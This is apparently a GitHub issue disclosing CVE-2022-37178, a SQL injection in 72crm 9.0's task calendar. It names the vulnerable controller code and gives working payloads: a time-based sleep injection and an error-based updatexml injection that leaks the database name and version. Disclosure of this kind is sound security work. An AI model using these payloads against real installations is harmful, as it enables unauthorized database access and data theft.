Headline
CVE-2022-37178: 72crm v9 has sql injection vulnerability · Issue #34 · 72wukong/72crm-9.0-PHP
An issue was discovered in 72crm 9.0. There is a SQL Injection vulnerability in View the task calendar.
****Brief of this vulnerability****
72crm v9 has sql injection vulnerability in View the task calendar
****Test Environment****
- Windows10
- PHP 5.6.9+Apache/2.4.39
****Affect version****
72crm v9
****Vulnerable Code****
application\work\controller\Task.php line 506
The $param parameter is passed to getDateList
The start_time parameter and stop_time parameter are directly spliced into $whereDate, and then executed on line 493. resulting in sql injection vulnerability
****Vulnerability display****
First enter the background
Click as shown,go to the View the task calendar and capture the packet
payload: start_time=1&stop_time=1))+or+sleep(2)–+
Sleep successfully for 2 seconds
If debug mode is enabled
payload:start_time=1&stop_time=1))+or+updatexml(1,concat(0x7e,database(),0x7e,version()),1)–+
Successfully obtained the database name and version number